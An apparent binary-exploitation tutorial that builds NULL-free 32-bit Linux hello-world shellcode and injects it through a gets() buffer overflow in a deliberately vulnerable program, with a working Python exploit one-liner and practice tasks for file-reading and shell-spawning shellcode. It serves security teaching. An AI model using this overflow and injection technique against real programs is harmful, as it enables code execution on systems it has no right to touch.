ret2shellcode
Shellcode
/* hello_world.c */
#include <stdio.h>
int main(int argc, char *argv[])
{
printf("HelloWorld !\n");
return 0;
}
A computer can't understand high-level languages. It only understands machine language, which is made of 1s and 0s, so we use a program called a compiler to translate human-readable source code into machine code.
gcc hello_world.c -o hello_world
When you compile the code above, the compiler translates its logic into machine instructions that the computer can execute directly.
You can see the translated code in the binary with the following command:
Note
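objdump is a tool for displaying information about object files such as ELF binaries. -D disassembles all sections and -M intel prints the instructions in Intel syntax.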
objdump -D -M intel hello_world
...
...
00000000000006b0 <main>:
6b0: 55 push rbp
6b1: 48 89 e5 mov rbp,rsp
6b4: 48 83 ec 10 sub rsp,0x10
6b8: 89 7d fc mov DWORD PTR [rbp-0x4],edi
6bb: 48 89 75 f0 mov QWORD PTR [rbp-0x10],rsi
6bf: 48 8d 3d 9e 00 00 00 lea rdi,[rip+0x9e] # 764 <_IO_stdin_used+0x4>
6c6: e8 95 fe ff ff call 560 <puts@plt>
6cb: b8 00 00 00 00 mov eax,0x0
6d0: c9 leave
6d1: c3 ret
...
...
Even code written in assembly language can't be executed directly by the computer; it must also be translated into machine instructions, which consist only of 1s and 0s. As you can see in the output above, the first instruction of main is push rbp, which is the assembly representation of the byte 0x55, or 01010101 in binary. This byte is what the computer actually understands and executes.
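As a quick check of the 0x55 = 01010101 correspondence, the following C sketch prints a byte in hex and in binary. The helpers byte_to_bits and print_opcode are illustrative names, not part of any library.

```c
#include <stdio.h>

/* Illustrative sketch: helper names are hypothetical. */

/* Write the 8-bit binary form of `byte` into `out` (8 digits plus '\0'),
 * most significant bit first. */
void byte_to_bits(unsigned char byte, char out[9])
{
    for (int i = 0; i < 8; i++) {
        /* bit 7 goes to out[0], bit 0 goes to out[7] */
        out[i] = (byte & (0x80u >> i)) ? '1' : '0';
    }
    out[8] = '\0';
}

/* Print an opcode byte in hex and binary, e.g. the 0x55 of push rbp. */
void print_opcode(unsigned char byte)
{
    char bits[9];
    byte_to_bits(byte, bits);
    printf("0x%02x = %s\n", byte, bits);
}
```

Calling print_opcode(0x55) prints 0x55 = 01010101, and print_opcode(0xc3), the ret at the end of main, prints 0xc3 = 11000011.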
When you run this binary, it is loaded into memory, and the processor executes its instructions one by one, reading each of them from memory:
┌──────────┐ ┌──────────┐ ┌────────────┐
│ fetch │ ─> │ decode │ ─> │ execute │
└──────────┘ └──────────┘ └────────────┘
^ ^ ^
│ │ │_ the operation is performed.
│ │_ computer understands which operation is to be performed.
│_ one instruction is fetched from the memory.
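The fetch-decode-execute cycle can be modelled with a toy interpreter. This is only an analogy under stated assumptions: the opcodes below (0x01 ADD, 0x02 SUB, 0xff HALT) are hypothetical and unrelated to real x86 encodings, and run_toy_cpu is an illustrative name. The loop fetches the byte at the program counter, decodes it with a switch, and executes the matching operation.

```c
#include <stddef.h>
#include <stdint.h>

/* Illustrative sketch: a toy machine with HYPOTHETICAL opcodes (not x86). */
enum {
    OP_ADD  = 0x01, /* ADD imm8: acc += next byte */
    OP_SUB  = 0x02, /* SUB imm8: acc -= next byte */
    OP_HALT = 0xff  /* HALT: stop */
};

/* Run the program stored in `mem` with a fetch-decode-execute loop.
 * On HALT, stores the accumulator in *acc_out and returns 0.
 * Returns -1 on an unknown opcode or if execution runs off the end. */
int run_toy_cpu(const uint8_t *mem, size_t len, int32_t *acc_out)
{
    int32_t acc = 0;
    size_t pc = 0; /* program counter: index of the next byte to fetch */

    while (pc < len) {
        uint8_t opcode = mem[pc++];      /* fetch */
        switch (opcode) {                /* decode */
        case OP_ADD:                     /* execute */
            if (pc >= len) return -1;    /* operand missing */
            acc += mem[pc++];
            break;
        case OP_SUB:
            if (pc >= len) return -1;
            acc -= mem[pc++];
            break;
        case OP_HALT:
            *acc_out = acc;
            return 0;
        default:
            return -1;                   /* byte that can't be decoded */
        }
    }
    return -1; /* fell off the end without HALT */
}
```

For the program { 0x01, 5, 0x01, 3, 0x02, 2, 0xff } the accumulator ends at 6. Like a real processor, the interpreter cannot tell whether the bytes it fetches were meant as code, which is what makes injected code possible.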
What if we could inject our own code into the memory of a process and redirect its control flow to execute that code? We could make the process do whatever we want. But we can't just write that logic as C or assembly source and place it in memory; we first have to encode our assembly instructions as machine code and inject those bytes.
Hello World
Let's write assembly code that prints "Hello world".
Earlier we used the C library function printf to print text to the screen. That option isn't available here: we are writing raw assembly, and injected code can't rely on knowing where the C library's functions are located in the target process.
Syscall
The kernel of an operating system is responsible for managing all the low-level resources, and it provides programmers with an interface to use them. A system call (syscall) is the programmatic way in which a program requests a service from the kernel, such as accessing the hard disk, writing to the screen, or reading from a file.
$ strace ./hello_world
execve("./hello_world", ["./hello_world"], [/* 56 vars */]) = 0
brk(NULL) = 0x55f1ee7c5000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f5a2c5b4000
...
...
munmap(0x7f5a2c585000, 191761) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL) = 0x55f1ee7c5000
brk(0x55f1ee7e6000) = 0x55f1ee7e6000
write(1, "HelloWorld !\n", 13HelloWorld !
) = 13
exit_group(0) = ?
Note
strace is a tool that displays the system calls a program makes.
As you can see, the compiled program does more than just print a string. The system calls at the start set up the environment and memory for the program, but the important part is the write() syscall: this is what actually outputs the string.
The Unix manual pages are divided into sections. Section 2 contains the manual pages for system calls, so man 2 write describes the write() system call. Its synopsis is:
#include <unistd.h>
ssize_t write(int fd, const void *buf, size_t count);
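Since write() is the only syscall that matters for printing, a C program can skip printf and issue it directly through glibc's syscall() wrapper. A minimal sketch, assuming Linux with glibc; raw_write is a hypothetical helper name.

```c
#define _GNU_SOURCE          /* exposes syscall() in <unistd.h> on glibc */
#include <string.h>
#include <sys/syscall.h>     /* SYS_write */
#include <unistd.h>

/* Illustrative sketch: raw_write is a hypothetical helper.
 * Prints `msg` with the raw write syscall, bypassing printf and stdio.
 * Returns what the kernel reported: bytes written, or -1 with errno set. */
long raw_write(int fd, const char *msg)
{
    return syscall(SYS_write, fd, msg, strlen(msg));
}
```

Under strace, a call such as raw_write(1, "HelloWorld !\n") should show up as a single write(1, "HelloWorld !\n", 13) = 13 line.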
The strace output also shows the arguments of the syscall. The buf and count arguments are a pointer to our string and its length. The fd argument, 1, is a special standard file descriptor. A file descriptor is a number used to refer to an open file or other input/output resource, and Unix uses them for almost everything: input, output, file access, network sockets, and so on. The first three file descriptors (0, 1, and 2) are automatically assigned to standard input, standard output, and standard error. When you open a new file, the kernel returns a new unique number that refers to that open file; that number is its file descriptor.
Writing bytes to standard output’s file descriptor of 1 will print the bytes; reading from standard input’s file descriptor of 0 will input bytes. The standard error file descriptor of 2 is used to display the error or debugging messages that can be filtered from the standard output.
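The standard descriptors can be exercised directly with the write() and open() wrappers. This sketch (helper names hypothetical) writes one line to fd 1 and one to fd 2, and opens a file to obtain a fresh descriptor.

```c
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Illustrative sketch: helper names are hypothetical. */

/* Write one line to standard output (fd 1) and one to standard error (fd 2).
 * Returns 0 if both writes completed, -1 otherwise. */
int write_std_streams(void)
{
    const char out[] = "to stdout (fd 1)\n";
    const char err[] = "to stderr (fd 2)\n";
    ssize_t a = write(STDOUT_FILENO, out, strlen(out)); /* STDOUT_FILENO is 1 */
    ssize_t b = write(STDERR_FILENO, err, strlen(err)); /* STDERR_FILENO is 2 */
    return (a == (ssize_t)strlen(out) && b == (ssize_t)strlen(err)) ? 0 : -1;
}

/* Open `path` read-only and return its new file descriptor, or -1 on error.
 * The kernel hands out the lowest unused number, so in a process where only
 * 0, 1 and 2 are open, this returns 3. */
int open_readonly(const char *path)
{
    return open(path, O_RDONLY);
}
```

Running a program that calls write_std_streams() with 2>/dev/null hides only the stderr line, which is the kind of filtering described above.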
In Linux, every syscall is identified by a predefined number, and its arguments are passed in registers. How syscalls are invoked differs between 32-bit and 64-bit x86, so we will focus on 32-bit shellcode.
On 32-bit x86, a syscall is made with the int 0x80 instruction. The kernel executes the syscall whose number is stored in the eax register and takes its arguments from ebx, ecx and edx (then esi, edi and ebp for syscalls that need more); the return value is placed in eax.
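The same register setup can be tried from C with GCC/Clang extended inline assembly before writing a standalone .asm file. A sketch, assuming a 32-bit build (gcc -m32) for the int 0x80 path; write_int80 is a hypothetical name, and on other targets the function falls back to glibc's syscall() so that it still compiles and runs.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Illustrative sketch: write_int80 is a hypothetical helper.
 * On i386: eax = 4 (write), ebx = fd, ecx = buf, edx = count, then int 0x80;
 * the result comes back in eax (negative values are -errno).
 * Elsewhere: falls back to syscall(), which returns -1 and sets errno. */
long write_int80(int fd, const void *buf, size_t count)
{
#if defined(__i386__)
    long ret;
    __asm__ volatile ("int $0x80"
                      : "=a"(ret)
                      : "a"(4), "b"(fd), "c"(buf), "d"(count)
                      : "memory");
    return ret;
#else
    return syscall(SYS_write, fd, buf, count);
#endif
}
```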
section .text ; Text segment
global _start ; Default entry point for ELF linking
_start:
jmp gotoCall ; Jump to gotoCall
shellcode:
; SYSCALL: write(1,msg,14)
mov eax, 4 ; Put 4 into eax, since write is syscall #4.
mov ebx, 1 ; Put 1 into ebx, since stdout is 1.
pop ecx ; Pop the Address of hello world from the stack
mov edx, 14 ; Put 14 into edx, since our string is 14 bytes.
int 0x80 ; Call the kernel to make the system call happen.
; SYSCALL: exit(0)
mov eax, 1 ; Put 1 into eax, since exit is syscall #1.
mov ebx, 0 ; Exit with success.
int 0x80 ; Do the syscall.
gotoCall:
call shellcode ; Pushes the address of string to stack
db "Hello, world!", 0x0a ; The string and newline char
$ nasm -f elf hello_world.asm
$ ld -m elf_i386 hello_world.o
$ ./a.out
Note
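nasm is an assembler: it converts the assembly source into an object file (-f elf selects the 32-bit ELF format). ld links that object file into an executable; -m elf_i386 tells it to produce a 32-bit x86 binary, and since no output name is given, the result is called a.out.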
The assembly code above prints "Hello, world!" and exits cleanly. Shellcode must avoid absolute addresses: it will be injected into a running process at an address we don't know in advance, so any address fixed at assembly time would be wrong. To get the address of the "Hello, world!" string without hard-coding it, the code first jumps to gotoCall. The call instruction there pushes the address of the next instruction onto the stack, which is the address of our string, and then jumps to shellcode, where we pop that address into ecx. We can use objdump to extract the resulting machine instructions.
$ objdump -D -M intel a.out
...
...
08048060 <_start>:
8048060: eb 1e jmp 8048080 <gotoCall>
08048062 <shellcode>:
8048062: b8 04 00 00 00 mov eax,0x4
8048067: bb 01 00 00 00 mov ebx,0x1
804806c: 59 pop ecx
804806d: ba 0e 00 00 00 mov edx,0xe
8048072: cd 80 int 0x80
8048074: b8 01 00 00 00 mov eax,0x1
8048079: bb 00 00 00 00 mov ebx,0x0
804807e: cd 80 int 0x80
08048080 <gotoCall>:
8048080: e8 dd ff ff ff call 8048062 <shellcode>
8048085: 48 dec eax ─
8048086: 65 6c gs ins BYTE PTR es:[edi],dx │
8048088: 6c ins BYTE PTR es:[edi],dx │
8048089: 6f outs dx,DWORD PTR ds:[esi] │ "Hello, world!"
804808a: 2c 20 sub al,0x20 │
804808c: 77 6f ja 80480fd <gotoCall+0x7d> │
804808e: 72 6c jb 80480fc <gotoCall+0x7c> │
8048090: 64 21 0a and DWORD PTR fs:[edx],ecx ─
...
...
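The jmp/call trick works because both instructions encode their targets relative to the address of the next instruction rather than as absolute addresses. This C sketch (helper names hypothetical) reproduces the eb 1e and e8 dd ff ff ff bytes from the dump above, and shows that moving the same code elsewhere in memory yields identical bytes.

```c
#include <stdint.h>

/* Illustrative sketch: helper names are hypothetical. */

/* Encode `call target` located at address `at`: opcode e8 followed by a
 * 32-bit little-endian displacement measured from the END of the
 * 5-byte instruction. */
void encode_call_rel32(uint32_t at, uint32_t target, uint8_t out[5])
{
    uint32_t rel = target - (at + 5); /* wraps modulo 2^32 for backward calls */
    out[0] = 0xe8;
    for (int i = 0; i < 4; i++)
        out[1 + i] = (uint8_t)(rel >> (8 * i)); /* least significant byte first */
}

/* Encode `jmp short target` located at `at`: eb plus a signed 8-bit offset
 * from the end of the 2-byte instruction. Returns 0, or -1 if out of range. */
int encode_jmp_rel8(uint32_t at, uint32_t target, uint8_t out[2])
{
    int64_t rel = (int64_t)target - ((int64_t)at + 2);
    if (rel < -128 || rel > 127)
        return -1;
    out[0] = 0xeb;
    out[1] = (uint8_t)(int8_t)rel;
    return 0;
}
```

encode_call_rel32(0x08048080, 0x08048062, buf) yields e8 dd ff ff ff, and encode_jmp_rel8(0x08048060, 0x08048080, buf) yields eb 1e, the same bytes objdump shows.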
The resultant shellcode is
"\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0e\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
You can use the following C program to test and debug the shellcode:
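/* shellcode.c */
#include <stdio.h>

unsigned char code[] = \
"\xeb\x1e\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0e" \
"\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00" \
"\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77" \
"\x6f\x72\x6c\x64\x21\x0a";

int main(void)
{
    /* sizeof counts every byte (minus the literal's terminator);
       strlen() would stop at the first NULL byte and report 4 */
    printf("Shellcode Length: %zu\n", sizeof(code) - 1);
    void (*ret)(void) = (void (*)(void))code; /* treat the bytes as a function */
    ret();                                    /* jump into the shellcode */
    return 0;
}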
$ gcc -m32 -fno-stack-protector -z execstack -no-pie shellcode.c
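This harness relies on -z execstack making the memory that holds code[] executable, which may not be the case with newer kernels or toolchains. An alternative sketch, not the method used in this tutorial, copies the bytes into a page obtained with mmap() and then switches that page to read/execute with mprotect(); load_shellcode is a hypothetical helper name.

```c
#define _GNU_SOURCE          /* MAP_ANONYMOUS */
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* Illustrative sketch: load_shellcode is a hypothetical helper.
 * Copies machine code into a fresh anonymous mapping, then makes it
 * executable. The page is mapped read/write, filled, and switched to
 * read/execute, so it is never writable and executable at the same time.
 * Returns the mapping (release it with munmap(p, len)) or NULL on failure. */
void *load_shellcode(const unsigned char *code, size_t len)
{
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return NULL;
    memcpy(p, code, len);
    if (mprotect(p, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(p, len);
        return NULL;
    }
    return p;
}
```

To run the result, call it through a function pointer such as void (*f)(void) = (void (*)(void))p;. The bytes still have to match the architecture of the process, so the 32-bit shellcode above needs a gcc -m32 build.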
We have successfully created shellcode, but it contains NULL bytes. In C, a string is a character array terminated by a NULL character, so string-handling functions such as strcpy() stop at the first NULL byte and would cut our shellcode short. We should therefore always try to make shellcode NULL-free.
The only way to do that is to use instructions whose encodings contain no NULL bytes.
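Checking candidate shellcode for forbidden bytes is easy to automate. This sketch (hypothetical helper names) locates the first occurrence of any byte from a "bad" set and counts the NULL bytes. Applied to the first shellcode, it reports a NULL at index 4, which is exactly where strlen() stops, and 16 NULL bytes in total.

```c
#include <stddef.h>

/* Illustrative sketch: helper names are hypothetical. */

/* Return the index of the first byte of `code` that appears in `bad`,
 * or -1 if there is none. With bad = { 0x00 } this finds where strcpy or
 * strlen would stop; with bad = { 0x0a } it finds where gets() would stop. */
long first_bad_byte(const unsigned char *code, size_t len,
                    const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (code[i] == bad[j])
                return (long)i;
    return -1;
}

/* Count how many NULL bytes the shellcode contains. */
size_t count_nulls(const unsigned char *code, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        n += (code[i] == 0x00);
    return n;
}
```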
Take mov eax, 0x4, which is encoded as b8 04 00 00 00. Because the destination is a 32-bit register, the encoding reserves 4 bytes for the immediate value; our constant only needs one byte, so the other three bytes are NULL. One way to avoid this is to move the value into the lower 8-bit part of the register, here al:
mov al, 0x4    ; encoded as b0 04
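Using the lower register produces NULL-free code. When doing this, we have to make sure the rest of the register is zero; otherwise whatever value was already in its upper bytes would corrupt ours. We can zero a register with the xor instruction, since XORing a value with itself always gives 0, and its encoding contains no NULL bytes:
xor eax, eax   ; encoded as 31 c0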
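The two mov encodings can be reproduced byte for byte. This sketch (hypothetical helper names) emits b8 04 00 00 00 for mov eax,0x4 and b0 04 for mov al,0x4, matching the objdump output in this section; the three trailing zeros of the first form come from storing the 32-bit immediate in little-endian order.

```c
#include <stddef.h>
#include <stdint.h>

/* Illustrative sketch: helper names are hypothetical. */

/* mov eax, imm32 -> b8 followed by the 4-byte little-endian immediate.
 * Small values leave the high bytes of the immediate as 0x00. */
size_t encode_mov_eax_imm32(uint32_t imm, uint8_t out[5])
{
    out[0] = 0xb8;
    for (int i = 0; i < 4; i++)
        out[1 + i] = (uint8_t)(imm >> (8 * i));
    return 5;
}

/* mov al, imm8 -> b0 followed by the single immediate byte. */
size_t encode_mov_al_imm8(uint8_t imm, uint8_t out[2])
{
    out[0] = 0xb0;
    out[1] = imm;
    return 2;
}
```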
section .text ; Text segment
global _start ; Default entry point for ELF linking
_start:
jmp gotoCall ; Jump to gotoCall
shellcode:
; SYSCALL: write(1,msg,14)
xor eax,eax ; Null the registers
xor ebx,ebx
xor edx,edx ; Does not need to xor ecx since pop will overwrite any previous value
mov al, 4 ; Put 4 into eax, since write is syscall #4.
mov bl, 1 ; Put 1 into ebx, since stdout is 1.
pop ecx ; Pop the Address of hello world from the stack
mov dl, 14 ; Put 14 into edx, since our string is 14 bytes.
int 0x80 ; Call the kernel to make the system call happen.
; SYSCALL: exit(0)
mov al, 1 ; Put 1 into eax, since exit is syscall #1 (eax's upper bytes are already 0, since it holds write's return value, 14).
xor ebx,ebx ; Exit with success.
int 0x80 ; Do the syscall.
gotoCall:
call shellcode ; Pushes the address of string to stack
db "Hello, world!", 0x0a ; The string and newline char
$ objdump -D -M intel a.out
...
...
08048060 <_start>:
8048060: eb 15 jmp 8048077 <gotoCall>
08048062 <shellcode>:
8048062: 31 c0 xor eax,eax
8048064: 31 db xor ebx,ebx
8048066: 31 d2 xor edx,edx
8048068: b0 04 mov al,0x4
804806a: b3 01 mov bl,0x1
804806c: 59 pop ecx
804806d: b2 0e mov dl,0xe
804806f: cd 80 int 0x80
8048071: b0 01 mov al,0x1
8048073: 31 db xor ebx,ebx
8048075: cd 80 int 0x80
08048077 <gotoCall>:
8048077: e8 e6 ff ff ff call 8048062 <shellcode>
804807c: 48 dec eax
804807d: 65 6c gs ins BYTE PTR es:[edi],dx
804807f: 6c ins BYTE PTR es:[edi],dx
8048080: 6f outs dx,DWORD PTR ds:[esi]
8048081: 2c 20 sub al,0x20
8048083: 77 6f ja 80480f4 <gotoCall+0x7d>
8048085: 72 6c jb 80480f3 <gotoCall+0x7c>
8048087: 64 21 0a and DWORD PTR fs:[edx],ecx
...
...
The resulting NULL-free shellcode:
"\xeb\x15\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0e\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
Practice Problem
- Write shellcode that opens a file and prints its contents.
Use the open syscall to open the file, then the read and write syscalls to print it.
- Write shellcode that spawns a shell.
See man 2 execve.
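For the first practice problem, it can help to get the syscall sequence working in C before writing it in assembly. This is a sketch of one possible C version, not an assembly solution; cat_file is a hypothetical name, and open(), read(), write() and close() are the libc wrappers around the syscalls of the same names.

```c
#include <fcntl.h>
#include <unistd.h>

/* Illustrative sketch: cat_file is a hypothetical helper.
 * Copies the contents of `path` to `out_fd` using open/read/write.
 * Returns the number of bytes copied, or -1 on error. */
long cat_file(const char *path, int out_fd)
{
    char buf[256];
    long total = 0;
    ssize_t n;

    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    while ((n = read(fd, buf, sizeof buf)) > 0) {
        ssize_t off = 0;
        while (off < n) {                    /* handle short writes */
            ssize_t w = write(out_fd, buf + off, (size_t)(n - off));
            if (w < 0) {
                close(fd);
                return -1;
            }
            off += w;
        }
        total += n;
    }
    close(fd);
    return n < 0 ? -1 : total;               /* n < 0 means read() failed */
}
```

cat_file("/etc/hostname", 1) would print that file to standard output, following the same open, read, write sequence the shellcode needs.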
ret2shellcode
Let's get into how we can use our previously created shellcode.
/* ret2shellcode.c */
#include <stdio.h>
#include <string.h>
char buf[0x100];
int main()
{
char inp[0x100]={0};
gets(inp);
strncpy(buf,inp,256);
return 0;
}
Binary file : ret2shellcode
gets() performs no bounds checking, so the program has a buffer overflow that lets us change its control flow by overwriting the saved return address of main. The question is where to jump.
main reads input from the user into inp and then copies it into a global variable called buf.
Let's look at the memory mappings of the running process (it stays alive while gets() waits for input):
$ pidof ret2shellcode
17255
$ cat /proc/17255/maps
08048000-08049000 r-xp 00000000 08:01 1516600 /tmp/ret2shellcode
08049000-0804a000 r-xp 00000000 08:01 1516600 /tmp/ret2shellcode
0804a000-0804b000 rwxp 00001000 08:01 1516600 /tmp/ret2shellcode
09d0f000-09d30000 rwxp 00000000 00:00 0 [heap]
f754e000-f76ff000 r-xp 00000000 08:01 5115852 /lib/i386-linux-gnu/libc-2.24.so
f76ff000-f7701000 r-xp 001b0000 08:01 5115852 /lib/i386-linux-gnu/libc-2.24.so
f7701000-f7702000 rwxp 001b2000 08:01 5115852 /lib/i386-linux-gnu/libc-2.24.so
f7702000-f7705000 rwxp 00000000 00:00 0
f7734000-f7737000 rwxp 00000000 00:00 0
f7737000-f7739000 r--p 00000000 00:00 0 [vvar]
f7739000-f773b000 r-xp 00000000 00:00 0 [vdso]
f773b000-f775e000 r-xp 00000000 08:01 5115848 /lib/i386-linux-gnu/ld-2.24.so
f775e000-f775f000 r-xp 00022000 08:01 5115848 /lib/i386-linux-gnu/ld-2.24.so
f775f000-f7760000 rwxp 00023000 08:01 5115848 /lib/i386-linux-gnu/ld-2.24.so
ffdd5000-ffdf6000 rwxp 00000000 00:00 0 [stack]
This is the memory map of our program. On Linux, the details of a process are exposed under the /proc/$PID/ directory, and its maps file lists the process's memory mappings. The pidof command returns the PID of a process by name.
Notice that the address of buf, 0x804a040, lies within 0x0804a000-0x0804b000, and the output above shows that this region has execute permission (rwxp). So if we put valid instructions at that address and redirect execution there, those instructions will be executed.
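The permission check done by eye above can also be done programmatically. This Linux-specific sketch reads /proc/self/maps (self refers to the calling process) and reports whether an address lies in a mapping whose permissions include x; addr_is_executable is a hypothetical helper.

```c
#include <stdint.h>
#include <stdio.h>

/* Illustrative sketch: addr_is_executable is a hypothetical helper.
 * Returns 1 if `addr` lies in a mapping of the current process whose
 * permission string contains 'x', 0 if it is in a non-executable mapping
 * or in no mapping at all, and -1 if /proc/self/maps can't be opened.
 * Parses lines such as:
 *   0804a000-0804b000 rwxp 00001000 08:01 1516600 /tmp/ret2shellcode */
int addr_is_executable(uintptr_t addr)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (f == NULL)
        return -1;

    char line[512];
    int result = 0;
    while (fgets(line, sizeof line, f) != NULL) {
        unsigned long start, end;
        char perms[5];
        if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) != 3)
            continue;                        /* not a mapping line */
        if (addr >= start && addr < end) {
            result = (perms[2] == 'x');      /* perms looks like "r-xp" */
            break;
        }
    }
    fclose(f);
    return result;
}
```

In a process laid out like the one above, an address such as 0x804a040 would be expected to return 1, while on a modern system built without -z execstack, data addresses usually return 0.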
So we can supply our shellcode as input and overflow the saved return address so that main returns into buf, and our shellcode will be executed.
Note
If the shellcode contains a null byte, strncpy copies the input only up to that byte and fills the rest of the 256 bytes with zeros, so everything after it is lost and the shellcode copied into buf is corrupted.
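The effect can be observed in isolation. In this sketch (hypothetical helper name), a fragment with a null byte in the middle loses everything after the null, while the exploit's shellcode, whose only null byte is its last one, survives strncpy intact.

```c
#include <stddef.h>
#include <string.h>

/* Illustrative sketch: intact_after_strncpy is a hypothetical helper.
 * Copies `len` bytes of machine code the way the target program does
 * (strncpy) and returns how many leading bytes arrived unchanged in `dst`.
 * strncpy stops at the first null byte and pads the rest of the `len`
 * bytes with zeros, so anything after an embedded null is lost. */
size_t intact_after_strncpy(char *dst, const char *code, size_t len)
{
    strncpy(dst, code, len);
    size_t i = 0;
    while (i < len && dst[i] == code[i])
        i++;
    return i;
}
```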
So our payload is: shellcode + junk + address of buf (which overwrites the saved return address).
The shellcode generated above would cause a problem here, because the "Hello, world!" string ends with a newline: gets stops reading at the first newline, so the rest of the payload would never be read. We just need to change that last "\x0a" byte to a null byte. Since it is the last byte of the shellcode, strncpy still copies everything before it.
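The payload layout and the newline restriction can be captured in a small C sketch that builds the same bytes as the Python one-liner below. build_payload is a hypothetical helper, and the offset of 264 bytes to the saved return address is taken from the exploit itself (42 bytes of shellcode plus 222 'A's), not measured independently.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Illustrative sketch: build_payload is a hypothetical helper.
 * Layout: shellcode | 'A' padding | 4-byte little-endian return address.
 * `ret_offset` is the distance from the start of the input to the saved
 * return address (264 in this tutorial's exploit).
 * Returns the payload length, or 0 if the shellcode is longer than
 * ret_offset, the payload doesn't fit in `cap`, or it contains a newline
 * (gets() would stop reading there). */
size_t build_payload(uint8_t *out, size_t cap,
                     const uint8_t *sc, size_t sc_len,
                     size_t ret_offset, uint32_t ret_addr)
{
    size_t total = ret_offset + 4;
    if (sc_len > ret_offset || total > cap)
        return 0;

    memcpy(out, sc, sc_len);
    memset(out + sc_len, 'A', ret_offset - sc_len);
    for (int i = 0; i < 4; i++)                  /* x86 is little-endian */
        out[ret_offset + i] = (uint8_t)(ret_addr >> (8 * i));

    if (memchr(out, '\n', total) != NULL)        /* would truncate gets() input */
        return 0;
    return total;
}
```

Writing the result to stdout with fwrite(), followed by a newline, and piping it into ./ret2shellcode should be equivalent to the one-liner.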
Exploit (the one-liner uses Python 2's print statement):
python -c 'print "\xeb\x15\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0e\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x00" + "A" * 222 + "\x08\x04\xa0\x40"[::-1]' | ./ret2shellcode
Hello, world!
We have successfully executed the shellcode. You can debug the program with gdb to watch what happens step by step.